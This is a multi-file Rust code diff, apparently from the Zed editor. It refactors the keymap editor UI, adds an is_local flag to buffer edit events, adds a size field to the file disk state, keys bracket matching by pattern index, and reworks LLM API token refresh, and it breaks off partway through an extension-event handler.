.on_action(cx.listener(Self::toggle_conflict_filter))
+ .on_action(cx.listener(Self::toggle_no_action_bindings))
.on_action(cx.listener(Self::toggle_keystroke_search))
.on_action(cx.listener(Self::toggle_exact_keystroke_matching))
.on_action(cx.listener(Self::show_matching_keystrokes))
@@ -1727,6 +1989,7 @@ impl Render for KeymapEditor {
.child(
h_flex()
.gap_2()
+ .items_center()
.child(
h_flex()
.key_context({
@@ -1748,152 +2011,65 @@ impl Render for KeymapEditor {
h_flex()
.gap_1()
.min_w_96()
+ .items_center()
.child(
IconButton::new(
- "KeymapEditorToggleFiltersIcon",
+ "KeymapEditorKeystrokeSearchButton",
IconName::Keyboard,
)
.icon_size(IconSize::Small)
+ .toggle_state(matches!(
+ search_mode,
+ SearchMode::KeyStroke { .. }
+ ))
.tooltip({
let focus_handle = focus_handle.clone();
-
move |_window, cx| {
Tooltip::for_action_in(
- "Search by Keystroke",
+ "Search by Keystrokes",
&ToggleKeystrokeSearch,
- &focus_handle.clone(),
+ &focus_handle,
cx,
)
}
})
- .toggle_state(matches!(
- self.search_mode,
- SearchMode::KeyStroke { .. }
- ))
- .on_click(|_, window, cx| {
+ .on_click(cx.listener(|_, _, window, cx| {
window.dispatch_action(
ToggleKeystrokeSearch.boxed_clone(),
cx,
);
- }),
+ })),
)
.child(
- IconButton::new("KeymapEditorConflictIcon", IconName::Warning)
- .icon_size(IconSize::Small)
- .when(
- self.keybinding_conflict_state
- .any_user_binding_conflicts(),
- |this| {
- this.indicator(
- Indicator::dot().color(Color::Warning),
- )
- },
+ self.render_filter_dropdown(focus_handle, cx)
+ )
+ .child(
+ Button::new("edit-in-json", "Edit in JSON")
+ .style(ButtonStyle::Subtle)
+ .key_binding(
+ ui::KeyBinding::for_action_in(&zed_actions::OpenKeymapFile, &focus_handle, cx)
+ .map(|kb| kb.size(rems_from_px(10.))),
)
- .tooltip({
- let filter_state = self.filter_state;
- let focus_handle = focus_handle.clone();
-
- move |_window, cx| {
- Tooltip::for_action_in(
- match filter_state {
- FilterState::All => "Show Conflicts",
- FilterState::Conflicts => {
- "Hide Conflicts"
- }
- },
- &ToggleConflictFilter,
- &focus_handle.clone(),
- cx,
- )
- }
- })
- .selected_icon_color(Color::Warning)
- .toggle_state(matches!(
- self.filter_state,
- FilterState::Conflicts
- ))
.on_click(|_, window, cx| {
window.dispatch_action(
- ToggleConflictFilter.boxed_clone(),
+ zed_actions::OpenKeymapFile.boxed_clone(),
cx,
);
- }),
+ })
)
.child(
- h_flex()
- .w_full()
- .px_1p5()
- .gap_1()
- .justify_end()
- .child(
- PopoverMenu::new("open-keymap-menu")
- .menu(move |window, cx| {
- Some(ContextMenu::build(window, cx, |menu, _, _| {
- menu.header("View Default...")
- .action(
- "Zed Key Bindings",
- zed_actions::OpenDefaultKeymap
- .boxed_clone(),
- )
- .action(
- "Vim Bindings",
- zed_actions::vim::OpenDefaultKeymap.boxed_clone(),
- )
- }))
- })
- .anchor(gpui::Corner::TopRight)
- .offset(gpui::Point {
- x: px(0.0),
- y: px(2.0),
- })
- .trigger_with_tooltip(
- IconButton::new(
- "OpenKeymapJsonButton",
- IconName::Ellipsis,
- )
- .icon_size(IconSize::Small),
- {
- let focus_handle = focus_handle.clone();
- move |_window, cx| {
- Tooltip::for_action_in(
- "View Default...",
- &zed_actions::OpenKeymapFile,
- &focus_handle,
- cx,
- )
- }
- },
- ),
+ Button::new("create", "Create Keybinding")
+ .style(ButtonStyle::Outlined)
+ .key_binding(
+ ui::KeyBinding::for_action_in(&OpenCreateKeybindingModal, &focus_handle, cx)
+ .map(|kb| kb.size(rems_from_px(10.))),
)
- .child(
- Button::new("edit-in-json", "Edit in JSON")
- .style(ButtonStyle::Subtle)
- .key_binding(
- ui::KeyBinding::for_action_in(&zed_actions::OpenKeymapFile, &focus_handle, cx)
- .map(|kb| kb.size(rems_from_px(10.))),
- )
- .on_click(|_, window, cx| {
- window.dispatch_action(
- zed_actions::OpenKeymapFile.boxed_clone(),
- cx,
- );
- })
- )
- .child(
- Button::new("create", "Create Keybinding")
- .style(ButtonStyle::Outlined)
- .key_binding(
- ui::KeyBinding::for_action_in(&OpenCreateKeybindingModal, &focus_handle, cx)
- .map(|kb| kb.size(rems_from_px(10.))),
- )
- .on_click(|_, window, cx| {
- window.dispatch_action(
- OpenCreateKeybindingModal.boxed_clone(),
- cx,
- );
- })
- )
-
+ .on_click(|_, window, cx| {
+ window.dispatch_action(
+ OpenCreateKeybindingModal.boxed_clone(),
+ cx,
+ );
+ })
)
),
)
@@ -1949,11 +2125,18 @@ impl Render for KeymapEditor {
let binding = &this.keybindings[candidate_id];
let action_name = binding.action().name;
let conflict = this.get_conflict(index);
+ let is_unbound_by_unbind = binding.is_unbound_by_unbind();
let is_overridden = conflict.is_some_and(|conflict| {
!conflict.is_user_keybind_conflict()
});
+ let is_dimmed = is_overridden || is_unbound_by_unbind;
- let icon = this.create_row_button(index, conflict, cx);
+ let icon = this.create_row_button(
+ index,
+ conflict,
+ is_unbound_by_unbind,
+ cx,
+ );
let action = div()
.id(("keymap action", index))
@@ -1974,7 +2157,7 @@ impl Render for KeymapEditor {
.when(
!context_menu_deployed
&& this.show_hover_menus
- && !is_overridden,
+ && !is_dimmed,
|this| {
this.tooltip({
let action_name = binding.action().name;
@@ -2027,7 +2210,7 @@ impl Render for KeymapEditor {
.when(
is_local
&& !context_menu_deployed
- && !is_overridden
+ && !is_dimmed
&& this.show_hover_menus,
|this| {
this.tooltip(Tooltip::element({
@@ -2062,6 +2245,10 @@ impl Render for KeymapEditor {
.map_row(cx.processor(
|this, (row_index, row): (usize, Stateful<Div>), _window, cx| {
let conflict = this.get_conflict(row_index);
+ let candidate_id = this.matches.get(row_index).map(|candidate| candidate.candidate_id);
+ let is_unbound_by_unbind = candidate_id
+ .and_then(|candidate_id| this.keybindings.get(candidate_id))
+ .is_some_and(ProcessedBinding::is_unbound_by_unbind);
let is_selected = this.selected_index == Some(row_index);
let row_id = row_group_id(row_index);
@@ -2070,38 +2257,43 @@ impl Render for KeymapEditor {
.id(("keymap-row-wrapper", row_index))
.child(
row.id(row_id.clone())
- .on_any_mouse_down(cx.listener(
- move |this,
- mouse_down_event: &gpui::MouseDownEvent,
- window,
- cx| {
- if mouse_down_event.button == MouseButton::Right {
- this.select_index(
- row_index, None, window, cx,
- );
- this.create_context_menu(
- mouse_down_event.position,
- window,
- cx,
- );
- }
- },
- ))
- .on_click(cx.listener(
- move |this, event: &ClickEvent, window, cx| {
- this.select_index(row_index, None, window, cx);
- if event.click_count() == 2 {
- this.open_edit_keybinding_modal(
- false, window, cx,
- );
- }
- },
- ))
+ .when(!is_unbound_by_unbind, |row| {
+ row.on_any_mouse_down(cx.listener(
+ move |this,
+ mouse_down_event: &gpui::MouseDownEvent,
+ window,
+ cx| {
+ if mouse_down_event.button == MouseButton::Right {
+ this.select_index(
+ row_index, None, window, cx,
+ );
+ this.create_context_menu(
+ mouse_down_event.position,
+ window,
+ cx,
+ );
+ }
+ },
+ ))
+ })
+ .when(!is_unbound_by_unbind, |row| {
+ row.on_click(cx.listener(
+ move |this, event: &ClickEvent, window, cx| {
+ this.select_index(row_index, None, window, cx);
+ if event.click_count() == 2 {
+ this.open_edit_keybinding_modal(
+ false, window, cx,
+ );
+ }
+ },
+ ))
+ })
.group(row_id)
.when(
- conflict.is_some_and(|conflict| {
- !conflict.is_user_keybind_conflict()
- }),
+ is_unbound_by_unbind
+ || conflict.is_some_and(|conflict| {
+ !conflict.is_user_keybind_conflict()
+ }),
|row| {
const OVERRIDDEN_OPACITY: f32 = 0.5;
row.opacity(OVERRIDDEN_OPACITY)
@@ -2109,7 +2301,8 @@ impl Render for KeymapEditor {
)
.when_some(
conflict.filter(|conflict| {
- !this.context_menu_deployed() &&
+ !is_unbound_by_unbind
+ && !this.context_menu_deployed() &&
!conflict.is_user_keybind_conflict()
}),
|row, conflict| {
@@ -2126,8 +2319,12 @@ impl Render for KeymapEditor {
}.map(|source| format!("This keybinding is overridden by the '{}' binding from {}.", binding.action().humanized_name, source))
}).unwrap_or_else(|| "This binding is overridden.".to_string());
- row.tooltip(Tooltip::text(context))},
- ),
+ row.tooltip(Tooltip::text(context))
+ },
+ )
+ .when(is_unbound_by_unbind, |row| {
+ row.tooltip(Tooltip::text("This action is unbound"))
+ }),
)
.border_2()
.when(
@@ -2928,9 +3125,11 @@ impl Render for KeybindingEditorModal {
.child(
Button::new("show_matching", "View")
.label_size(LabelSize::Small)
- .icon(IconName::ArrowUpRight)
- .icon_color(Color::Muted)
- .icon_size(IconSize::Small)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(cx.listener(
|this, _, window, cx| {
this.show_matching_bindings(
@@ -3711,13 +3910,8 @@ impl SerializableItem for KeymapEditor {
_window: &mut Window,
cx: &mut App,
) -> gpui::Task<gpui::Result<()>> {
- workspace::delete_unloaded_items(
- alive_items,
- workspace_id,
- "keybinding_editors",
- &KEYBINDING_EDITORS,
- cx,
- )
+ let db = KeybindingEditorDb::global(cx);
+ workspace::delete_unloaded_items(alive_items, workspace_id, "keybinding_editors", &db, cx)
}
fn deserialize(
@@ -3728,11 +3922,9 @@ impl SerializableItem for KeymapEditor {
window: &mut Window,
cx: &mut App,
) -> gpui::Task<gpui::Result<Entity<Self>>> {
+ let db = KeybindingEditorDb::global(cx);
window.spawn(cx, async move |cx| {
- if KEYBINDING_EDITORS
- .get_keybinding_editor(item_id, workspace_id)?
- .is_some()
- {
+ if db.get_keybinding_editor(item_id, workspace_id)?.is_some() {
cx.update(|window, cx| cx.new(|cx| KeymapEditor::new(workspace, window, cx)))
} else {
Err(anyhow!("No keybinding editor to deserialize"))
@@ -3749,11 +3941,10 @@ impl SerializableItem for KeymapEditor {
cx: &mut ui::Context<Self>,
) -> Option<gpui::Task<gpui::Result<()>>> {
let workspace_id = workspace.database_id()?;
- Some(cx.background_spawn(async move {
- KEYBINDING_EDITORS
- .save_keybinding_editor(item_id, workspace_id)
- .await
- }))
+ let db = KeybindingEditorDb::global(cx);
+ Some(cx.background_spawn(
+ async move { db.save_keybinding_editor(item_id, workspace_id).await },
+ ))
}
fn should_serialize(&self, _event: &Self::Event) -> bool {
@@ -3782,7 +3973,7 @@ mod persistence {
)];
}
- db::static_connection!(KEYBINDING_EDITORS, KeybindingEditorDb, [WorkspaceDb]);
+ db::static_connection!(KeybindingEditorDb, [WorkspaceDb]);
impl KeybindingEditorDb {
query! {
@@ -3955,4 +4146,25 @@ mod tests {
assert!(cmp("!(!(!a))", "!a"));
assert!(cmp("!(!(!(!a)))", "a"));
}
+
+ #[test]
+ fn binding_is_unbound_by_unbind_respects_precedence() {
+ let binding = gpui::KeyBinding::new("tab", zed_actions::OpenKeymap, None);
+ let unbind =
+ gpui::KeyBinding::new("tab", gpui::Unbind(binding.action().name().into()), None);
+
+ let unbind_then_binding = vec![&unbind, &binding];
+ assert!(!binding_is_unbound_by_unbind(
+ &binding,
+ 1,
+ &unbind_then_binding,
+ ));
+
+ let binding_then_unbind = vec![&binding, &unbind];
+ assert!(binding_is_unbound_by_unbind(
+ &binding,
+ 0,
+ &binding_then_unbind,
+ ));
+ }
}
@@ -359,7 +359,7 @@ pub enum BufferEvent {
is_local: bool,
},
/// The buffer was edited.
- Edited,
+ Edited { is_local: bool },
/// The buffer's `dirty` bit changed.
DirtyChanged,
/// The buffer was saved.
@@ -435,7 +435,7 @@ pub enum DiskState {
/// File created in Zed that has not been saved.
New,
/// File present on the filesystem.
- Present { mtime: MTime },
+ Present { mtime: MTime, size: u64 },
/// Deleted file that was previously present.
Deleted,
/// An old version of a file that was previously present
@@ -448,7 +448,17 @@ impl DiskState {
pub fn mtime(self) -> Option<MTime> {
match self {
DiskState::New => None,
- DiskState::Present { mtime } => Some(mtime),
+ DiskState::Present { mtime, .. } => Some(mtime),
+ DiskState::Deleted => None,
+ DiskState::Historic { .. } => None,
+ }
+ }
+
+ /// Returns the file's size on disk in bytes.
+ pub fn size(self) -> Option<u64> {
+ match self {
+ DiskState::New => None,
+ DiskState::Present { size, .. } => Some(size),
DiskState::Deleted => None,
DiskState::Historic { .. } => None,
}
@@ -2377,7 +2387,7 @@ impl Buffer {
};
match file.disk_state() {
DiskState::New => false,
- DiskState::Present { mtime } => match self.saved_mtime {
+ DiskState::Present { mtime, .. } => match self.saved_mtime {
Some(saved_mtime) => {
mtime.bad_is_greater_than(saved_mtime) && self.has_unsaved_edits()
}
@@ -2457,7 +2467,7 @@ impl Buffer {
false
};
if let Some((transaction_id, start_version)) = self.text.end_transaction_at(now) {
- self.did_edit(&start_version, was_dirty, cx);
+ self.did_edit(&start_version, was_dirty, true, cx);
Some(transaction_id)
} else {
None
@@ -2844,7 +2854,13 @@ impl Buffer {
Some(edit_id)
}
- fn did_edit(&mut self, old_version: &clock::Global, was_dirty: bool, cx: &mut Context<Self>) {
+ fn did_edit(
+ &mut self,
+ old_version: &clock::Global,
+ was_dirty: bool,
+ is_local: bool,
+ cx: &mut Context<Self>,
+ ) {
self.was_changed();
if self.edits_since::<usize>(old_version).next().is_none() {
@@ -2852,10 +2868,20 @@ impl Buffer {
}
self.reparse(cx, true);
- cx.emit(BufferEvent::Edited);
- if was_dirty != self.is_dirty() {
+ cx.emit(BufferEvent::Edited { is_local });
+ let is_dirty = self.is_dirty();
+ if was_dirty != is_dirty {
cx.emit(BufferEvent::DirtyChanged);
}
+ if was_dirty && !is_dirty {
+ if let Some(file) = self.file.as_ref() {
+ if matches!(file.disk_state(), DiskState::Present { .. })
+ && file.disk_state().mtime() != self.saved_mtime
+ {
+ cx.emit(BufferEvent::ReloadNeeded);
+ }
+ }
+ }
cx.notify();
}
@@ -2964,7 +2990,7 @@ impl Buffer {
self.text.apply_ops(buffer_ops);
self.deferred_ops.insert(deferred_ops);
self.flush_deferred_ops(cx);
- self.did_edit(&old_version, was_dirty, cx);
+ self.did_edit(&old_version, was_dirty, false, cx);
// Notify independently of whether the buffer was edited as the operations could include a
// selection update.
cx.notify();
@@ -3119,7 +3145,7 @@ impl Buffer {
if let Some((transaction_id, operation)) = self.text.undo() {
self.send_operation(Operation::Buffer(operation), true, cx);
- self.did_edit(&old_version, was_dirty, cx);
+ self.did_edit(&old_version, was_dirty, true, cx);
self.restore_encoding_for_transaction(transaction_id, was_dirty);
Some(transaction_id)
} else {
@@ -3137,7 +3163,7 @@ impl Buffer {
let old_version = self.version.clone();
if let Some(operation) = self.text.undo_transaction(transaction_id) {
self.send_operation(Operation::Buffer(operation), true, cx);
- self.did_edit(&old_version, was_dirty, cx);
+ self.did_edit(&old_version, was_dirty, true, cx);
true
} else {
false
@@ -3159,7 +3185,7 @@ impl Buffer {
self.send_operation(Operation::Buffer(operation), true, cx);
}
if undone {
- self.did_edit(&old_version, was_dirty, cx)
+ self.did_edit(&old_version, was_dirty, true, cx)
}
undone
}
@@ -3169,7 +3195,7 @@ impl Buffer {
let operation = self.text.undo_operations(counts);
let old_version = self.version.clone();
self.send_operation(Operation::Buffer(operation), true, cx);
- self.did_edit(&old_version, was_dirty, cx);
+ self.did_edit(&old_version, was_dirty, true, cx);
}
/// Manually redoes a specific transaction in the buffer's redo history.
@@ -3179,7 +3205,7 @@ impl Buffer {
if let Some((transaction_id, operation)) = self.text.redo() {
self.send_operation(Operation::Buffer(operation), true, cx);
- self.did_edit(&old_version, was_dirty, cx);
+ self.did_edit(&old_version, was_dirty, true, cx);
self.restore_encoding_for_transaction(transaction_id, was_dirty);
Some(transaction_id)
} else {
@@ -3220,7 +3246,7 @@ impl Buffer {
self.send_operation(Operation::Buffer(operation), true, cx);
}
if redone {
- self.did_edit(&old_version, was_dirty, cx)
+ self.did_edit(&old_version, was_dirty, true, cx)
}
redone
}
@@ -3330,7 +3356,7 @@ impl Buffer {
if !ops.is_empty() {
for op in ops {
self.send_operation(Operation::Buffer(op), true, cx);
- self.did_edit(&old_version, was_dirty, cx);
+ self.did_edit(&old_version, was_dirty, true, cx);
}
}
}
@@ -4584,7 +4610,7 @@ impl BufferSnapshot {
continue;
}
- let mut all_brackets: Vec<(BracketMatch<usize>, bool)> = Vec::new();
+ let mut all_brackets: Vec<(BracketMatch<usize>, usize, bool)> = Vec::new();
let mut opens = Vec::new();
let mut color_pairs = Vec::new();
@@ -4610,8 +4636,9 @@ impl BufferSnapshot {
let mut open = None;
let mut close = None;
let syntax_layer_depth = mat.depth;
+ let pattern_index = mat.pattern_index;
let config = configs[mat.grammar_index];
- let pattern = &config.patterns[mat.pattern_index];
+ let pattern = &config.patterns[pattern_index];
for capture in mat.captures {
if capture.index == config.open_capture_ix {
open = Some(capture.node.byte_range());
@@ -4632,7 +4659,7 @@ impl BufferSnapshot {
}
open_to_close_ranges
- .entry((open_range.start, open_range.end))
+ .entry((open_range.start, open_range.end, pattern_index))
.or_insert_with(BTreeMap::new)
.insert(
(close_range.start, close_range.end),
@@ -4653,6 +4680,7 @@ impl BufferSnapshot {
newline_only: pattern.newline_only,
color_index: None,
},
+ pattern_index,
pattern.rainbow_exclude,
));
}
@@ -4666,22 +4694,43 @@ impl BufferSnapshot {
// For each close, we know the expected open_len from tree-sitter matches.
// Map each close to its expected open length (for inferring opens)
- let close_to_open_len: HashMap<(usize, usize), usize> = all_brackets
+ let close_to_open_len: HashMap<(usize, usize, usize), usize> = all_brackets
.iter()
- .map(|(m, _)| ((m.close_range.start, m.close_range.end), m.open_range.len()))
+ .map(|(bracket_match, pattern_index, _)| {
+ (
+ (
+ bracket_match.close_range.start,
+ bracket_match.close_range.end,
+ *pattern_index,
+ ),
+ bracket_match.open_range.len(),
+ )
+ })
.collect();
// Collect unique opens and closes within this chunk
- let mut unique_opens: HashSet<(usize, usize)> = all_brackets
+ let mut unique_opens: HashSet<(usize, usize, usize)> = all_brackets
.iter()
- .map(|(m, _)| (m.open_range.start, m.open_range.end))
- .filter(|(start, _)| chunk_range.contains(start))
+ .map(|(bracket_match, pattern_index, _)| {
+ (
+ bracket_match.open_range.start,
+ bracket_match.open_range.end,
+ *pattern_index,
+ )
+ })
+ .filter(|(start, _, _)| chunk_range.contains(start))
.collect();
- let mut unique_closes: Vec<(usize, usize)> = all_brackets
+ let mut unique_closes: Vec<(usize, usize, usize)> = all_brackets
.iter()
- .map(|(m, _)| (m.close_range.start, m.close_range.end))
- .filter(|(start, _)| chunk_range.contains(start))
+ .map(|(bracket_match, pattern_index, _)| {
+ (
+ bracket_match.close_range.start,
+ bracket_match.close_range.end,
+ *pattern_index,
+ )
+ })
+ .filter(|(start, _, _)| chunk_range.contains(start))
.collect();
unique_closes.sort();
unique_closes.dedup();
@@ -4690,8 +4739,9 @@ impl BufferSnapshot {
let mut unique_opens_vec: Vec<_> = unique_opens.iter().copied().collect();
unique_opens_vec.sort();
- let mut valid_pairs: HashSet<((usize, usize), (usize, usize))> = HashSet::default();
- let mut open_stack: Vec<(usize, usize)> = Vec::new();
+ let mut valid_pairs: HashSet<((usize, usize, usize), (usize, usize, usize))> =
+ HashSet::default();
+ let mut open_stacks: HashMap<usize, Vec<(usize, usize)>> = HashMap::default();
let mut open_idx = 0;
for close in &unique_closes {
@@ -4699,36 +4749,53 @@ impl BufferSnapshot {
while open_idx < unique_opens_vec.len()
&& unique_opens_vec[open_idx].0 < close.0
{
- open_stack.push(unique_opens_vec[open_idx]);
+ let (start, end, pattern_index) = unique_opens_vec[open_idx];
+ open_stacks
+ .entry(pattern_index)
+ .or_default()
+ .push((start, end));
open_idx += 1;
}
// Try to match with most recent open
- if let Some(open) = open_stack.pop() {
- valid_pairs.insert((open, *close));
+ let (close_start, close_end, pattern_index) = *close;
+ if let Some(open) = open_stacks
+ .get_mut(&pattern_index)
+ .and_then(|open_stack| open_stack.pop())
+ {
+ valid_pairs.insert(((open.0, open.1, pattern_index), *close));
} else if let Some(&open_len) = close_to_open_len.get(close) {
// No open on stack - infer one based on expected open_len
- if close.0 >= open_len {
- let inferred = (close.0 - open_len, close.0);
+ if close_start >= open_len {
+ let inferred = (close_start - open_len, close_start, pattern_index);
unique_opens.insert(inferred);
valid_pairs.insert((inferred, *close));
all_brackets.push((
BracketMatch {
open_range: inferred.0..inferred.1,
- close_range: close.0..close.1,
+ close_range: close_start..close_end,
newline_only: false,
syntax_layer_depth: 0,
color_index: None,
},
+ pattern_index,
false,
));
}
}
}
- all_brackets.retain(|(m, _)| {
- let open = (m.open_range.start, m.open_range.end);
- let close = (m.close_range.start, m.close_range.end);
+ all_brackets.retain(|(bracket_match, pattern_index, _)| {
+ let open = (
+ bracket_match.open_range.start,
+ bracket_match.open_range.end,
+ *pattern_index,
+ );
+ let close = (
+ bracket_match.close_range.start,
+ bracket_match.close_range.end,
+ *pattern_index,
+ );
valid_pairs.contains(&(open, close))
});
}
@@ -4736,7 +4803,7 @@ impl BufferSnapshot {
let mut all_brackets = all_brackets
.into_iter()
.enumerate()
- .map(|(index, (bracket_match, rainbow_exclude))| {
+ .map(|(index, (bracket_match, _, rainbow_exclude))| {
// Certain languages have "brackets" that are not brackets, e.g. tags. and such
// bracket will match the entire tag with all text inside.
// For now, avoid highlighting any pair that has more than single char in each bracket.
@@ -458,15 +458,18 @@ fn test_edit_events(cx: &mut gpui::App) {
assert_eq!(
mem::take(&mut *buffer_1_events.lock()),
vec![
- BufferEvent::Edited,
+ BufferEvent::Edited { is_local: true },
BufferEvent::DirtyChanged,
- BufferEvent::Edited,
- BufferEvent::Edited,
+ BufferEvent::Edited { is_local: true },
+ BufferEvent::Edited { is_local: true },
]
);
assert_eq!(
mem::take(&mut *buffer_2_events.lock()),
- vec![BufferEvent::Edited, BufferEvent::DirtyChanged]
+ vec![
+ BufferEvent::Edited { is_local: false },
+ BufferEvent::DirtyChanged
+ ]
);
buffer1.update(cx, |buffer, cx| {
@@ -481,11 +484,17 @@ fn test_edit_events(cx: &mut gpui::App) {
});
assert_eq!(
mem::take(&mut *buffer_1_events.lock()),
- vec![BufferEvent::Edited, BufferEvent::DirtyChanged,]
+ vec![
+ BufferEvent::Edited { is_local: true },
+ BufferEvent::DirtyChanged,
+ ]
);
assert_eq!(
mem::take(&mut *buffer_2_events.lock()),
- vec![BufferEvent::Edited, BufferEvent::DirtyChanged]
+ vec![
+ BufferEvent::Edited { is_local: false },
+ BufferEvent::DirtyChanged
+ ]
);
}
@@ -30,6 +30,13 @@ impl fmt::Display for PaymentRequiredError {
pub struct LlmApiToken(Arc<RwLock<Option<String>>>);
impl LlmApiToken {
+ pub fn global(cx: &App) -> Self {
+ RefreshLlmTokenListener::global(cx)
+ .read(cx)
+ .llm_api_token
+ .clone()
+ }
+
pub async fn acquire(
&self,
client: &Arc<Client>,
@@ -56,6 +63,20 @@ impl LlmApiToken {
Self::fetch(self.0.write().await, client, organization_id).await
}
+ /// Clears the existing token before attempting to fetch a new one.
+ ///
+ /// Used when switching organizations so that a failed refresh doesn't
+ /// leave a token for the wrong organization.
+ pub async fn clear_and_refresh(
+ &self,
+ client: &Arc<Client>,
+ organization_id: Option<OrganizationId>,
+ ) -> Result<String> {
+ let mut lock = self.0.write().await;
+ *lock = None;
+ Self::fetch(lock, client, organization_id).await
+ }
+
async fn fetch(
mut lock: RwLockWriteGuard<'_, Option<String>>,
client: &Arc<Client>,
@@ -75,13 +96,16 @@ impl LlmApiToken {
*lock = Some(response.token.0.clone());
Ok(response.token.0)
}
- Err(err) => match err {
- ClientApiError::Unauthorized => {
- client.request_sign_out();
- Err(err).context("Failed to create LLM token")
+ Err(err) => {
+ *lock = None;
+ match err {
+ ClientApiError::Unauthorized => {
+ client.request_sign_out();
+ Err(err).context("Failed to create LLM token")
+ }
+ ClientApiError::Other(err) => Err(err),
}
- ClientApiError::Other(err) => Err(err),
- },
+ }
}
}
}
@@ -98,17 +122,25 @@ impl NeedsLlmTokenRefresh for http_client::Response<http_client::AsyncBody> {
}
}
+enum TokenRefreshMode {
+ Refresh,
+ ClearAndRefresh,
+}
+
struct GlobalRefreshLlmTokenListener(Entity<RefreshLlmTokenListener>);
impl Global for GlobalRefreshLlmTokenListener {}
-pub struct RefreshLlmTokenEvent;
+pub struct LlmTokenRefreshedEvent;
pub struct RefreshLlmTokenListener {
+ client: Arc<Client>,
+ user_store: Entity<UserStore>,
+ llm_api_token: LlmApiToken,
_subscription: Subscription,
}
-impl EventEmitter<RefreshLlmTokenEvent> for RefreshLlmTokenListener {}
+impl EventEmitter<LlmTokenRefreshedEvent> for RefreshLlmTokenListener {}
impl RefreshLlmTokenListener {
pub fn register(client: Arc<Client>, user_store: Entity<UserStore>, cx: &mut App) {
@@ -122,27 +154,56 @@ impl RefreshLlmTokenListener {
fn new(client: Arc<Client>, user_store: Entity<UserStore>, cx: &mut Context<Self>) -> Self {
client.add_message_to_client_handler({
- let this = cx.entity();
+ let this = cx.weak_entity();
move |message, cx| {
- Self::handle_refresh_llm_token(this.clone(), message, cx);
+ if let Some(this) = this.upgrade() {
+ Self::handle_refresh_llm_token(this, message, cx);
+ }
}
});
- let subscription = cx.subscribe(&user_store, |_this, _user_store, event, cx| {
+ let subscription = cx.subscribe(&user_store, |this, _user_store, event, cx| {
if matches!(event, client::user::Event::OrganizationChanged) {
- cx.emit(RefreshLlmTokenEvent);
+ this.refresh(TokenRefreshMode::ClearAndRefresh, cx);
}
});
Self {
+ client,
+ user_store,
+ llm_api_token: LlmApiToken::default(),
_subscription: subscription,
}
}
+ fn refresh(&self, mode: TokenRefreshMode, cx: &mut Context<Self>) {
+ let client = self.client.clone();
+ let llm_api_token = self.llm_api_token.clone();
+ let organization_id = self
+ .user_store
+ .read(cx)
+ .current_organization()
+ .map(|organization| organization.id.clone());
+ cx.spawn(async move |this, cx| {
+ match mode {
+ TokenRefreshMode::Refresh => {
+ llm_api_token.refresh(&client, organization_id).await?;
+ }
+ TokenRefreshMode::ClearAndRefresh => {
+ llm_api_token
+ .clear_and_refresh(&client, organization_id)
+ .await?;
+ }
+ }
+ this.update(cx, |_this, cx| cx.emit(LlmTokenRefreshedEvent))
+ })
+ .detach_and_log_err(cx);
+ }
+
fn handle_refresh_llm_token(this: Entity<Self>, message: &MessageToClient, cx: &mut App) {
match message {
MessageToClient::UserUpdated => {
- this.update(cx, |_this, cx| cx.emit(RefreshLlmTokenEvent));
+ this.update(cx, |this, cx| this.refresh(TokenRefreshMode::Refresh, cx));
}
}
}
@@ -234,7 +234,9 @@ pub struct LanguageModelToolResult {
pub tool_use_id: LanguageModelToolUseId,
pub tool_name: Arc<str>,
pub is_error: bool,
+ /// The tool output formatted for presenting to the model
pub content: LanguageModelToolResultContent,
+ /// The raw tool output, if available, often for debugging or extra state for replay
pub output: Option<serde_json::Value>,
}
@@ -20,7 +20,6 @@ aws-credential-types = { workspace = true, features = ["hardcoded-credentials"]
aws_http_client.workspace = true
base64.workspace = true
bedrock = { workspace = true, features = ["schemars"] }
-chrono.workspace = true
client.workspace = true
cloud_api_types.workspace = true
cloud_llm_client.workspace = true
@@ -48,6 +47,7 @@ menu.workspace = true
mistral = { workspace = true, features = ["schemars"] }
ollama = { workspace = true, features = ["schemars"] }
open_ai = { workspace = true, features = ["schemars"] }
+opencode = { workspace = true, features = ["schemars"] }
open_router = { workspace = true, features = ["schemars"] }
partial-json-fixer.workspace = true
release_channel.workspace = true
@@ -68,7 +68,6 @@ vercel = { workspace = true, features = ["schemars"] }
x_ai = { workspace = true, features = ["schemars"] }
[dev-dependencies]
-
language_model = { workspace = true, features = ["test-support"] }
pretty_assertions.workspace = true
@@ -24,6 +24,7 @@ use crate::provider::ollama::OllamaLanguageModelProvider;
use crate::provider::open_ai::OpenAiLanguageModelProvider;
use crate::provider::open_ai_compatible::OpenAiCompatibleLanguageModelProvider;
use crate::provider::open_router::OpenRouterLanguageModelProvider;
+use crate::provider::opencode::OpenCodeLanguageModelProvider;
use crate::provider::vercel::VercelLanguageModelProvider;
use crate::provider::vercel_ai_gateway::VercelAiGatewayLanguageModelProvider;
use crate::provider::x_ai::XAiLanguageModelProvider;
@@ -38,37 +39,43 @@ pub fn init(user_store: Entity<UserStore>, client: Arc<Client>, cx: &mut App) {
// Subscribe to extension store events to track LLM extension installations
if let Some(extension_store) = extension_host::ExtensionStore::try_global(cx) {
cx.subscribe(&extension_store, {
- let registry = registry.clone();
- move |extension_store, event, cx| match event {
- extension_host::Event::ExtensionInstalled(extension_id) => {
- if let Some(manifest) = extension_store
- .read(cx)
- .extension_manifest_for_id(extension_id)
- {
- if !manifest.language_model_providers.is_empty() {
- registry.update(cx, |registry, cx| {
- registry.extension_installed(extension_id.clone(), cx);
- });
+ let registry = registry.downgrade();
+ move |extension_store, event, cx| {
+ let Some(registry) = registry.upgrade() else {
+ return;
+ };
+ match event {
+ extension_host::Event::ExtensionInstalled(extension_id) => {
+ if let Some(manifest) = extension_store
+ .read(cx)
+ .extension_manifest_for_id(extension_id)
+ {
+ if !manifest.language_model_providers.is_empty() {
+ registry.update(cx, |registry, cx| {
+ registry.extension_installed(extension_id.clone(), cx);
+ });
+ }
}
}
- }
- extension_host::Event::ExtensionUninstalled(extension_id) => {
- registry.update(cx, |registry, cx| {
- registry.extension_uninstalled(extension_id, cx);
- });
- }
- extension_host::Event::ExtensionsUpdated => {
- let mut new_ids = HashSet::default();
- for (extension_id, entry) in extension_store.read(cx).installed_extensions() {
- if !entry.manifest.language_model_providers.is_empty() {
- new_ids.insert(extension_id.clone());
+ extension_host::Event::ExtensionUninstalled(extension_id) => {
+ registry.update(cx, |registry, cx| {
+ registry.extension_uninstalled(extension_id, cx);
+ });
+ }
+ extension_host::Event::ExtensionsUpdated => {
+ let mut new_ids = HashSet::default();
+ for (extension_id, entry) in extension_store.read(cx).installed_extensions()
+ {
